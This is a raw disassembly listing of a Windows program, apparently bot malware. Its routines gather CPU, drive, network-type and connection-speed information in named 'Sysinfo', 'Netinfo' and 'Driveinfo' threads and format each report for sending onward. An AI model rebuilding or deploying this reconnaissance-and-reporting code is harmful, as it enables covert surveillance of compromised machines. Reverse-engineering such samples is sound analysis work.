mov [ebp+var_484], edx
mov [ebp+var_480], ecx
lea eax, [ebp+var_488]
mov [ebp+var_6EC], eax
and [ebp+var_70C], 0
lea eax, [ebp+var_70C]
push eax
push 20019h
push 0
push offset aHardwareDescri ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
push 80000002h
call dword_417008 ; RegOpenKeyExA
test eax, eax
jnz short loc_4086B3
and [ebp+var_73C], 0
mov [ebp+var_740], 80h
lea eax, [ebp+var_740]
push eax
lea eax, [ebp+var_488]
push eax
lea eax, [ebp+var_73C]
push eax
push 0
push offset aProcessornames ; "ProcessorNameString"
push [ebp+var_70C]
call dword_41700C ; RegQueryValueExA
test eax, eax
jnz short loc_4086A7
push 1
push 1
lea eax, [ebp+var_488]
push eax
call sub_407C2C
add esp, 0Ch
loc_4086A7: ; CODE XREF: sub_4083AD+2E5�j
push [ebp+var_70C]
call dword_417028 ; RegCloseKey
loc_4086B3: ; CODE XREF: sub_4083AD+2A8�j
cmp [ebp+var_6E4], 1
jnz short loc_4086C8
mov [ebp+var_748], offset byte_41DE00
jmp short loc_4086D2
; ---------------------------------------------------------------------------
loc_4086C8: ; CODE XREF: sub_4083AD+30D�j
mov [ebp+var_748], offset dword_4191F4
loc_4086D2: ; CODE XREF: sub_4083AD+319�j
cmp [ebp+var_524], 1
jnz short loc_4086E7
mov [ebp+var_74C], offset byte_41DE00
jmp short loc_4086F1
; ---------------------------------------------------------------------------
loc_4086E7: ; CODE XREF: sub_4083AD+32C�j
mov [ebp+var_74C], offset dword_4191F4
loc_4086F1: ; CODE XREF: sub_4083AD+338�j
cmp [ebp+var_6E8], 1
jnz short loc_408706
mov [ebp+var_750], offset byte_41DE00
jmp short loc_408710
; ---------------------------------------------------------------------------
loc_408706: ; CODE XREF: sub_4083AD+34B�j
mov [ebp+var_750], offset dword_4191F4
loc_408710: ; CODE XREF: sub_4083AD+357�j
lea eax, [ebp+var_708]
push eax
lea eax, [ebp+var_6E0]
push eax
push [ebp+var_748]
push [ebp+var_6E4]
push [ebp+var_74C]
push [ebp+var_524]
push [ebp+var_750]
push [ebp+var_6E8]
push [ebp+var_4]
push [ebp+var_6F0]
push [ebp+var_738]
call sub_40821B
push eax
push [ebp+var_6EC]
push [ebp+var_514]
push [ebp+var_518]
push [ebp+var_51C]
push [ebp+var_710]
push [ebp+var_48C]
push offset dword_419104
push 400h
lea eax, [ebp+var_408]
push eax
call sub_416BAE ; _snprintf
add esp, 54h
lea eax, [ebp+var_408]
push eax
push offset dword_418B64
lea eax, [ebp+var_6C8]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_6CC]
call sub_409763
pop ecx
xor eax, eax
pop edi
pop esi
pop ebx
leave
retn 4
sub_4083AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4087C4 proc near ; CODE XREF: sub_40A9CF+1B9C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4087DE
jmp short locret_408806
; ---------------------------------------------------------------------------
loc_4087DE: ; CODE XREF: sub_4087C4+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aSysinfoThread ; "Sysinfo thread"
push 0
push [ebp+var_4]
push offset sub_4083AD
call sub_4095A4
add esp, 10h
locret_408806: ; CODE XREF: sub_4087C4+18�j
leave
retn
sub_4087C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408808 proc near ; CODE XREF: sub_408887+B�p
; sub_408887+19�p ...
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
push [ebp+arg_0]
lea eax, [ebp+var_28]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_28]
push eax
call sub_4105FB
pop ecx
call sub_416B64 ; clock
mov [ebp+var_4], eax
push 7D0h
push 0
push offset a80 ; "80"
lea eax, [ebp+var_28]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
push [ebp+var_8]
call sub_4053B1
pop ecx
cmp [ebp+var_8], 0
jnz short loc_40885F
mov eax, 3E8h
jmp short locret_408885
; ---------------------------------------------------------------------------
loc_40885F: ; CODE XREF: sub_408808+4E�j
call sub_416B64 ; clock
sub eax, [ebp+var_4]
cmp eax, 3E8h
jnb short loc_40887B
call sub_416B64 ; clock
sub eax, [ebp+var_4]
mov [ebp+var_2C], eax
jmp short loc_408882
; ---------------------------------------------------------------------------
loc_40887B: ; CODE XREF: sub_408808+64�j
mov [ebp+var_2C], 3E8h
loc_408882: ; CODE XREF: sub_408808+71�j
mov eax, [ebp+var_2C]
locret_408885: ; CODE XREF: sub_408808+55�j
leave
retn
sub_408808 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408887 proc near ; CODE XREF: sub_408B30+1C2�p
; sub_40CA29+1E9�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
push offset dword_418F60
call sub_408808
pop ecx
mov [ebp+var_4], eax
push offset dword_418F6C
call sub_408808
pop ecx
mov [ebp+var_8], eax
push offset dword_418F84
call sub_408808
pop ecx
mov [ebp+var_C], eax
push offset dword_418F90
call sub_408808
pop ecx
mov [ebp+var_10], eax
push offset dword_418FA0
call sub_408808
pop ecx
mov [ebp+var_14], eax
push offset dword_418FB0
call sub_408808
pop ecx
mov [ebp+var_18], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
add eax, [ebp+var_C]
add eax, [ebp+var_10]
add eax, [ebp+var_14]
add eax, [ebp+var_18]
xor edx, edx
push 6
pop ecx
div ecx
leave
retn
sub_408887 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4088FC proc near ; CODE XREF: sub_408B30:loc_408D33�p
var_438 = qword ptr -438h
var_430 = dword ptr -430h
var_42C = qword ptr -42Ch
var_424 = dword ptr -424h
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = byte ptr -418h
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = byte ptr -308h
var_208 = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 438h
and [ebp+var_8], 0
jmp short loc_408912
; ---------------------------------------------------------------------------
loc_40890B: ; CODE XREF: sub_4088FC+23�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_408912: ; CODE XREF: sub_4088FC+D�j
mov eax, [ebp+var_8]
cmp off_418FC4[eax*4], 0
jz short loc_408921
jmp short loc_40890B
; ---------------------------------------------------------------------------
loc_408921: ; CODE XREF: sub_4088FC+21�j
mov eax, [ebp+var_8]
shr eax, 1
mov [ebp+var_8], eax
and [ebp+var_4], 0
jmp short loc_408936
; ---------------------------------------------------------------------------
loc_40892F: ; CODE XREF: sub_4088FC+D6�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_408936: ; CODE XREF: sub_4088FC+31�j
cmp [ebp+var_4], 3
jnb loc_408B2C
mov eax, [ebp+var_8]
dec eax
push eax
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_318], eax
mov eax, [ebp+var_318]
shl eax, 1
push off_418FC4[eax*4]
lea eax, [ebp+var_418]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_418]
push eax
call sub_4105FB
pop ecx
mov eax, [ebp+var_318]
shl eax, 1
push off_418FC8[eax*4]
lea eax, [ebp+var_308]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_308]
push eax
call sub_4105FB
pop ecx
push 2710h
push 0
push offset a80 ; "80"
lea eax, [ebp+var_418]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_310], eax
cmp [ebp+var_310], 0
jnz short loc_4089D7
jmp loc_40892F
; ---------------------------------------------------------------------------
loc_4089D7: ; CODE XREF: sub_4088FC+D4�j
lea eax, [ebp+var_418]
push eax
lea eax, [ebp+var_308]
push eax
push offset aGetSHttp1_0Hos ; "GET /%s HTTP/1.0\r\nHost: %s\r\n\r\n"
push 200h
lea eax, [ebp+var_208]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_208]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_208]
push eax
push [ebp+var_310]
call sub_4053BF
add esp, 0Ch
and [ebp+var_314], 0
call sub_416B64 ; clock
mov [ebp+var_41C], eax
and [ebp+var_30C], 0
loc_408A3A: ; CODE XREF: sub_4088FC+1AF�j
; sub_4088FC+22B�j
push 1388h
push 200h
lea eax, [ebp+var_208]
push eax
push [ebp+var_310]
call sub_405443
add esp, 10h
mov [ebp+var_420], eax
cmp [ebp+var_420], 0
jz short loc_408A93
cmp [ebp+var_420], 0FFFFFFFFh
jz short loc_408A93
call sub_416B64 ; clock
sub eax, [ebp+var_41C]
cmp eax, 1388h
jnb short loc_408A93
cmp [ebp+var_30C], 100000h
jb loc_408B15
loc_408A93: ; CODE XREF: sub_4088FC+16A�j
; sub_4088FC+173�j ...
cmp [ebp+var_30C], 2000h
jnb short loc_408AAD
push [ebp+var_310]
call sub_40538D
pop ecx
jmp short loc_408A3A
; ---------------------------------------------------------------------------
loc_408AAD: ; CODE XREF: sub_4088FC+1A1�j
mov eax, [ebp+var_30C]
mov dword ptr [ebp+var_42C], eax
and dword ptr [ebp+var_42C+4], 0
fild [ebp+var_42C]
fstp [ebp+var_430]
call sub_416B64 ; clock
sub eax, [ebp+var_41C]
mov dword ptr [ebp+var_438], eax
and dword ptr [ebp+var_438+4], 0
fild [ebp+var_438]
fdiv flt_417270
fdivr [ebp+var_430]
call sub_416CF8 ; _ftol
mov [ebp+var_424], eax
push [ebp+var_310]
call sub_40538D
pop ecx
mov eax, [ebp+var_424]
jmp short locret_408B2E
; ---------------------------------------------------------------------------
loc_408B15: ; CODE XREF: sub_4088FC+191�j
mov eax, [ebp+var_30C]
add eax, [ebp+var_420]
mov [ebp+var_30C], eax
jmp loc_408A3A
; ---------------------------------------------------------------------------
loc_408B2C: ; CODE XREF: sub_4088FC+3E�j
xor eax, eax
locret_408B2E: ; CODE XREF: sub_4088FC+217�j
leave
retn
sub_4088FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408B30 proc near ; DATA XREF: sub_408E4A+35�o
var_A9C = qword ptr -0A9Ch
var_A7C = qword ptr -0A7Ch
var_A74 = dword ptr -0A74h
var_A70 = dword ptr -0A70h
var_A6C = dword ptr -0A6Ch
var_A68 = dword ptr -0A68h
var_A64 = dword ptr -0A64h
var_A60 = dword ptr -0A60h
var_A5C = byte ptr -0A5Ch
var_8B8 = dword ptr -8B8h
var_8B4 = dword ptr -8B4h
var_8B0 = byte ptr -8B0h
var_830 = dword ptr -830h
var_82C = dword ptr -82Ch
var_828 = dword ptr -828h
var_824 = dword ptr -824h
var_820 = dword ptr -820h
var_81C = dword ptr -81Ch
var_818 = dword ptr -818h
var_814 = byte ptr -814h
var_414 = byte ptr -414h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A7Ch
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_A60]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push offset dword_41EF18
lea eax, [ebp+var_414]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_824]
push eax
push 0
push 0
push offset dword_41EF18
call dword_41DE54 ; getaddrinfo
test eax, eax
jnz short loc_408BBC
push 1
push 0
push 0
push 401h
lea eax, [ebp+var_414]
push eax
mov eax, [ebp+var_824]
push dword ptr [eax+10h]
mov eax, [ebp+var_824]
push dword ptr [eax+18h]
call dword_41DE58 ; getnameinfo
push [ebp+var_824]
call dword_41DE5C ; freeaddrinfo
loc_408BBC: ; CODE XREF: sub_408B30+54�j
call sub_409318
mov [ebp+var_8B8], eax
mov eax, [ebp+var_8B8]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_830], eax
mov eax, [ebp+var_8B8]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_820], eax
mov eax, [ebp+var_8B8]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_82C], eax
push offset aUnknown_0 ; "Unknown"
lea eax, [ebp+var_8B0]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset aUnknown_0 ; "Unknown"
lea eax, [ebp+var_10]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
cmp dword_41DE4C, 0
jz short loc_408C9F
push 0
push 80h
lea eax, [ebp+var_8B0]
push eax
lea eax, [ebp+var_818]
push eax
call dword_41DE4C ; InternetGetConnectedStateEx
test eax, eax
jz short loc_408C9F
mov eax, [ebp+var_818]
and eax, 1
test eax, eax
jz short loc_408C8F
push offset aModem ; "Modem"
lea eax, [ebp+var_10]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_408C9F
; ---------------------------------------------------------------------------
loc_408C8F: ; CODE XREF: sub_408B30+14B�j
push offset aLan ; "LAN"
lea eax, [ebp+var_10]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_408C9F: ; CODE XREF: sub_408B30+11F�j
; sub_408B30+13E�j ...
call sub_4043E9
test eax, eax
jz short loc_408CB4
mov [ebp+var_A64], offset aYes ; "Yes"
jmp short loc_408CBE
; ---------------------------------------------------------------------------
loc_408CB4: ; CODE XREF: sub_408B30+176�j
mov [ebp+var_A64], offset aNo ; "No"
loc_408CBE: ; CODE XREF: sub_408B30+182�j
mov eax, [ebp+var_A64]
mov [ebp+var_8], eax
call sub_404279
test eax, eax
jz short loc_408CDC
mov [ebp+var_A68], offset aYes ; "Yes"
jmp short loc_408CE6
; ---------------------------------------------------------------------------
loc_408CDC: ; CODE XREF: sub_408B30+19E�j
mov [ebp+var_A68], offset aNo ; "No"
loc_408CE6: ; CODE XREF: sub_408B30+1AA�j
mov eax, [ebp+var_A68]
mov [ebp+var_8B4], eax
call sub_408887
mov [ebp+var_828], eax
mov [ebp+var_81C], offset aBad ; "Bad"
cmp [ebp+var_828], 2EEh
jnb short loc_408D1D
mov [ebp+var_81C], offset aAvarage ; "Avarage"
loc_408D1D: ; CODE XREF: sub_408B30+1E1�j
cmp [ebp+var_828], 1F4h
jnb short loc_408D33
mov [ebp+var_81C], offset aGood ; "Good"
loc_408D33: ; CODE XREF: sub_408B30+1F7�j
call sub_4088FC
mov [ebp+var_4], eax
cmp [ebp+var_82C], 1
jnz short loc_408D50
mov [ebp+var_A6C], offset byte_41DE00
jmp short loc_408D5A
; ---------------------------------------------------------------------------
loc_408D50: ; CODE XREF: sub_408B30+212�j
mov [ebp+var_A6C], offset dword_4191F4
loc_408D5A: ; CODE XREF: sub_408B30+21E�j
cmp [ebp+var_820], 1
jnz short loc_408D6F
mov [ebp+var_A70], offset byte_41DE00
jmp short loc_408D79
; ---------------------------------------------------------------------------
loc_408D6F: ; CODE XREF: sub_408B30+231�j
mov [ebp+var_A70], offset dword_4191F4
loc_408D79: ; CODE XREF: sub_408B30+23D�j
cmp [ebp+var_830], 1
jnz short loc_408D8E
mov [ebp+var_A74], offset byte_41DE00
jmp short loc_408D98
; ---------------------------------------------------------------------------
loc_408D8E: ; CODE XREF: sub_408B30+250�j
mov [ebp+var_A74], offset dword_4191F4
loc_408D98: ; CODE XREF: sub_408B30+25C�j
push [ebp+var_A6C]
push [ebp+var_82C]
push [ebp+var_A70]
push [ebp+var_820]
push [ebp+var_A74]
push [ebp+var_830]
mov eax, [ebp+var_4]
mov dword ptr [ebp+var_A7C], eax
and dword ptr [ebp+var_A7C+4], 0
fild [ebp+var_A7C]
fdiv flt_417274
push ecx
push ecx
fstp [esp+0A9Ch+var_A9C]
push [ebp+var_828]
push [ebp+var_81C]
push [ebp+var_8B4]
push [ebp+var_8]
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8B0]
push eax
lea eax, [ebp+var_414]
push eax
push offset dword_419284
push 400h
lea eax, [ebp+var_814]
push eax
call sub_416BAE ; _snprintf
add esp, 48h
lea eax, [ebp+var_814]
push eax
push offset dword_418B64
lea eax, [ebp+var_A5C]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_A60]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_408B30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408E4A proc near ; CODE XREF: sub_40A9CF+1BD8�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_408E64
jmp short locret_408E8C
; ---------------------------------------------------------------------------
loc_408E64: ; CODE XREF: sub_408E4A+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aNetinfoThread ; "Netinfo thread"
push 0
push [ebp+var_4]
push offset sub_408B30
call sub_4095A4
add esp, 10h
locret_408E8C: ; CODE XREF: sub_408E4A+18�j
leave
retn
sub_408E4A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408E8E proc near ; CODE XREF: sub_40CA29+1C5�p
; sub_40CA29+2DA�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
push ebp
mov ebp, esp
sub esp, 24h
mov eax, dword_419398
mov [ebp+var_1C], eax
and [ebp+var_10], 0
and [ebp+var_C], 0
loc_408EA4: ; CODE XREF: sub_408E8E+95�j
lea eax, [ebp+var_1C]
push eax
call dword_4170CC ; GetDriveTypeA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_408F14
cmp [ebp+var_10], 1
jz short loc_408F14
cmp [ebp+var_10], 5
jz short loc_408EE1
cmp [ebp+var_10], 2
jz short loc_408EE1
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_1C]
push eax
call dword_4170C8 ; GetDiskFreeSpaceExA
jmp short loc_408EF1
; ---------------------------------------------------------------------------
loc_408EE1: ; CODE XREF: sub_408E8E+33�j
; sub_408E8E+39�j
push 8
push 0
lea eax, [ebp+var_24]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_408EF1: ; CODE XREF: sub_408E8E+51�j
push 0
push 100000h
push [ebp+var_20]
push [ebp+var_24]
call sub_416C90
mov [ebp+var_24], eax
mov [ebp+var_20], edx
mov eax, [ebp+var_24]
mov ecx, [ebp+var_C]
add ecx, eax
mov [ebp+var_C], ecx
loc_408F14: ; CODE XREF: sub_408E8E+27�j
; sub_408E8E+2D�j
mov al, byte ptr [ebp+var_1C]
add al, 1
mov byte ptr [ebp+var_1C], al
movsx eax, byte ptr [ebp+var_1C]
cmp eax, 5Ah
jnz loc_408EA4
mov eax, [ebp+var_C]
leave
retn
sub_408E8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408F2E proc near ; DATA XREF: sub_4091E2+35�o
var_5DC = dword ptr -5DCh
var_5D8 = dword ptr -5D8h
var_5D4 = dword ptr -5D4h
var_5D0 = byte ptr -5D0h
var_42C = dword ptr -42Ch
var_428 = dword ptr -428h
var_424 = dword ptr -424h
var_420 = byte ptr -420h
var_418 = dword ptr -418h
var_414 = dword ptr -414h
var_410 = dword ptr -410h
var_40C = byte ptr -40Ch
var_404 = byte ptr -404h
var_3EF = byte ptr -3EFh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5DCh
push esi
push edi
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_5D4]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 5
pop ecx
mov esi, offset aDriveInformati ; "Drive information - "
lea edi, [ebp+var_404]
rep movsd
movsb
mov ecx, 0FAh
xor eax, eax
lea edi, [ebp+var_3EF]
rep stosd
stosw
stosb
mov eax, dword_419398
mov [ebp+var_424], eax
and [ebp+var_418], 0
and [ebp+var_5D8], 0
and [ebp+var_414], 0
mov [ebp+var_410], 1
loc_408FA6: ; CODE XREF: sub_408F2E+23B�j
lea eax, [ebp+var_424]
push eax
call dword_4170CC ; GetDriveTypeA
mov [ebp+var_5DC], eax
cmp [ebp+var_5DC], 0
jz loc_409151
cmp [ebp+var_5DC], 1
jz loc_409151
cmp [ebp+var_5DC], 2
jnz short loc_408FE5
mov [ebp+var_4], offset aRemovable ; "removable"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_408FE5: ; CODE XREF: sub_408F2E+AC�j
cmp [ebp+var_5DC], 3
jnz short loc_408FF7
mov [ebp+var_4], offset aFixed ; "fixed"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_408FF7: ; CODE XREF: sub_408F2E+BE�j
cmp [ebp+var_5DC], 4
jnz short loc_409009
mov [ebp+var_4], offset aRemote ; "remote"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_409009: ; CODE XREF: sub_408F2E+D0�j
cmp [ebp+var_5DC], 5
jnz short loc_40901B
mov [ebp+var_4], offset aCdRom ; "cd-rom"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_40901B: ; CODE XREF: sub_408F2E+E2�j
cmp [ebp+var_5DC], 6
jnz short loc_40902D
mov [ebp+var_4], offset aRamdisk ; "ramdisk"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_40902D: ; CODE XREF: sub_408F2E+F4�j
mov [ebp+var_4], offset aUnknown ; "unknown"
loc_409034: ; CODE XREF: sub_408F2E+B5�j
; sub_408F2E+C7�j ...
cmp [ebp+var_5DC], 5
jz short loc_40906A
cmp [ebp+var_5DC], 2
jz short loc_40906A
lea eax, [ebp+var_42C]
push eax
lea eax, [ebp+var_420]
push eax
lea eax, [ebp+var_40C]
push eax
lea eax, [ebp+var_424]
push eax
call dword_4170C8 ; GetDiskFreeSpaceExA
jmp short loc_40907D
; ---------------------------------------------------------------------------
loc_40906A: ; CODE XREF: sub_408F2E+10D�j
; sub_408F2E+116�j
push 8
push 0
lea eax, [ebp+var_42C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_40907D: ; CODE XREF: sub_408F2E+13A�j
push 0
push 100000h
push [ebp+var_428]
push [ebp+var_42C]
call sub_416C90
mov [ebp+var_42C], eax
mov [ebp+var_428], edx
cmp [ebp+var_410], 0
jnz short loc_4090BF
push offset dword_419404
lea eax, [ebp+var_404]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
jmp short loc_4090C6
; ---------------------------------------------------------------------------
loc_4090BF: ; CODE XREF: sub_408F2E+17A�j
and [ebp+var_410], 0
loc_4090C6: ; CODE XREF: sub_408F2E+18F�j
mov eax, [ebp+var_42C]
or eax, [ebp+var_428]
test eax, eax
jz short loc_40910A
push [ebp+var_428]
push [ebp+var_42C]
push [ebp+var_4]
lea eax, [ebp+var_424]
push eax
lea eax, [ebp+var_404]
push eax
push offset dword_4193E4
lea eax, [ebp+var_404]
push eax
call dword_4171E0 ; wsprintfA
add esp, 1Ch
jmp short loc_409130
; ---------------------------------------------------------------------------
loc_40910A: ; CODE XREF: sub_408F2E+1A6�j
push [ebp+var_4]
lea eax, [ebp+var_424]
push eax
lea eax, [ebp+var_404]
push eax
push offset dword_4193D4
lea eax, [ebp+var_404]
push eax
call dword_4171E0 ; wsprintfA
add esp, 14h
loc_409130: ; CODE XREF: sub_408F2E+1DA�j
mov eax, [ebp+var_42C]
mov ecx, [ebp+var_414]
add ecx, eax
mov [ebp+var_414], ecx
mov eax, [ebp+var_5D8]
inc eax
mov [ebp+var_5D8], eax
loc_409151: ; CODE XREF: sub_408F2E+92�j
; sub_408F2E+9F�j
mov al, byte ptr [ebp+var_424]
add al, 1
mov byte ptr [ebp+var_424], al
movsx eax, byte ptr [ebp+var_424]
cmp eax, 5Ah
jnz loc_408FA6
cmp [ebp+var_5D8], 0
jz short loc_40918B
push offset dword_419404
lea eax, [ebp+var_404]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
loc_40918B: ; CODE XREF: sub_408F2E+248�j
push [ebp+var_414]
push [ebp+var_5D8]
lea eax, [ebp+var_404]
push eax
push offset dword_41939C
lea eax, [ebp+var_404]
push eax
call dword_4171E0 ; wsprintfA
add esp, 14h
lea eax, [ebp+var_404]
push eax
push offset dword_418B64
lea eax, [ebp+var_5D0]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_5D4]
call sub_409763
pop ecx
xor eax, eax
pop edi
pop esi
leave
retn 4
sub_408F2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4091E2 proc near ; CODE XREF: sub_40A9CF+1C61�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4091FC
jmp short locret_409224
; ---------------------------------------------------------------------------
loc_4091FC: ; CODE XREF: sub_4091E2+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aDriveinfoThrea ; "Driveinfo thread"
push 0
push [ebp+var_4]
push offset sub_408F2E
call sub_4095A4
add esp, 10h
locret_409224: ; CODE XREF: sub_4091E2+18�j
leave
retn
sub_4091E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409226 proc near ; CODE XREF: sub_4167F1+215�p
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call dword_4170D8 ; QueryPerformanceCounter
lea eax, [ebp+var_10]
push eax
call dword_4170D4 ; QueryPerformanceFrequency
cmp [ebp+var_4], 0
jl short loc_40928E
jg short loc_40924E
cmp [ebp+var_8], 0
jbe short loc_40928E
loc_40924E: ; CODE XREF: sub_409226+20�j
cmp [ebp+var_C], 0
jl short loc_40928E
jg short loc_40925C
cmp [ebp+var_10], 0
jbe short loc_40928E
loc_40925C: ; CODE XREF: sub_409226+2E�j
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_8]
call sub_416D10
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx
fstp [esp+20h+var_20]
call sub_416CFE ; ceil
pop ecx
pop ecx
call sub_416CF8 ; _ftol
mov dword_41E2A0, eax
jmp short locret_4092A2
; ---------------------------------------------------------------------------
loc_40928E: ; CODE XREF: sub_409226+1E�j
; sub_409226+26�j ...
call dword_4170D0 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov dword_41E2A0, eax
locret_4092A2: ; CODE XREF: sub_409226+66�j
leave
retn
sub_409226 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4092A4 proc near ; CODE XREF: sub_4083AD+61�p
; sub_40A9CF+1CCA�p ...
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call dword_4170D8 ; QueryPerformanceCounter
lea eax, [ebp+var_10]
push eax
call dword_4170D4 ; QueryPerformanceFrequency
cmp [ebp+var_4], 0
jl short loc_409307
jg short loc_4092CC
cmp [ebp+var_8], 0
jbe short loc_409307
loc_4092CC: ; CODE XREF: sub_4092A4+20�j
cmp [ebp+var_C], 0
jl short loc_409307
jg short loc_4092DA
cmp [ebp+var_10], 0
jbe short loc_409307
loc_4092DA: ; CODE XREF: sub_4092A4+2E�j
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_8]
call sub_416D10
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx
fstp [esp+20h+var_20]
call sub_416CFE ; ceil
pop ecx
pop ecx
call sub_416CF8 ; _ftol
jmp short locret_409316
; ---------------------------------------------------------------------------
loc_409307: ; CODE XREF: sub_4092A4+1E�j
; sub_4092A4+26�j ...
call dword_4170D0 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
locret_409316: ; CODE XREF: sub_4092A4+61�j
leave
retn
sub_4092A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409318 proc near ; CODE XREF: sub_408B30:loc_408BBC�p
; sub_40A9CF:loc_40C715�p
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
